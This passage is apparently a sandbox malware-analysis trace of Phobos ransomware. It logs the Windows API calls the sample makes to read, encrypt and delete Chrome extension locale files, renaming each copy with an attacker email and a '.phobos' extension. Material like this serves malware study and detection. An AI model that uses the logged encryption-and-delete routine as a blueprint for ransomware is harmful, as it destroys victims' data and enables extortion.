nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x52cb, lpOverlapped=0x0) returned 1 [0163.064] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x52d0, dwBufLen=0x52d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x52d0) returned 1 [0163.064] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x52d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x52d0, lpOverlapped=0x0) returned 1 [0163.065] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0163.065] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.065] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0163.066] CryptDestroyKey (hKey=0xa32da8) returned 1 [0163.066] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0163.066] CryptDestroyKey (hKey=0xa32968) returned 1 [0163.066] CloseHandle (hObject=0x17c) returned 1 [0163.066] CloseHandle (hObject=0x134) returned 1 [0163.066] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json")) returned 1 [0163.067] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0163.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0163.067] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16477) returned 1 [0163.067] CloseHandle (hObject=0x134) returned 1 [0163.067] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json")) returned 0x2020 [0163.067] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0163.068] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.068] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0163.070] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0163.070] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.070] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x405d, lpOverlapped=0x0) returned 1 [0163.300] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4060, dwBufLen=0x4060 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4060) returned 1 [0163.300] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4060, lpOverlapped=0x0) returned 1 [0163.301] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0163.301] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.301] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0163.301] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0163.302] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0163.302] CryptDestroyKey (hKey=0xa32968) returned 1 [0163.302] CloseHandle (hObject=0x134) returned 1 [0163.302] CloseHandle (hObject=0x17c) returned 1 [0163.302] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json")) returned 1 [0163.303] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0163.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0163.303] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16249) returned 1 [0163.303] CloseHandle (hObject=0x17c) returned 1 [0163.303] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json")) returned 0x2020 [0163.303] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0163.304] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.304] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0163.304] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0163.304] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.304] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3f79, lpOverlapped=0x0) returned 1 [0163.527] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3f80, dwBufLen=0x3f80 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3f80) returned 1 [0163.527] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3f80, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3f80, lpOverlapped=0x0) returned 1 [0163.528] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0163.528] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.528] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0163.528] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0163.528] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0163.529] CryptDestroyKey (hKey=0xa32968) returned 1 [0163.529] CloseHandle (hObject=0x17c) returned 1 [0163.529] CloseHandle (hObject=0x134) returned 1 [0163.529] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json")) returned 1 [0163.530] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0163.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0163.530] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=19198) returned 1 [0163.530] CloseHandle (hObject=0x134) returned 1 [0163.530] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json")) returned 0x2020 [0163.530] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0163.531] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.531] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0163.531] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0163.531] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.531] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x4afe, lpOverlapped=0x0) returned 1 [0163.797] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4b00, dwBufLen=0x4b00 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4b00) returned 1 [0163.797] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4b00, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4b00, lpOverlapped=0x0) returned 1 [0163.798] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0163.798] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.798] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0163.798] CryptDestroyKey (hKey=0xa32da8) returned 1 [0163.798] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0163.799] CryptDestroyKey (hKey=0xa32968) returned 1 [0163.799] CloseHandle (hObject=0x134) returned 1 [0163.799] CloseHandle (hObject=0x17c) returned 1 [0163.799] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json")) returned 1 [0163.800] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0163.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0163.800] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16005) returned 1 [0163.800] CloseHandle (hObject=0x17c) returned 1 [0163.800] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json")) returned 0x2020 [0163.800] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0163.800] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.801] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0163.801] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0163.801] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.801] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3e85, lpOverlapped=0x0) returned 1 [0163.910] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3e90, dwBufLen=0x3e90 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3e90) returned 1 [0163.910] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3e90, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3e90, lpOverlapped=0x0) returned 1 [0163.911] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0163.911] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.911] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0163.911] CryptDestroyKey (hKey=0xa32da8) returned 1 [0163.911] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: 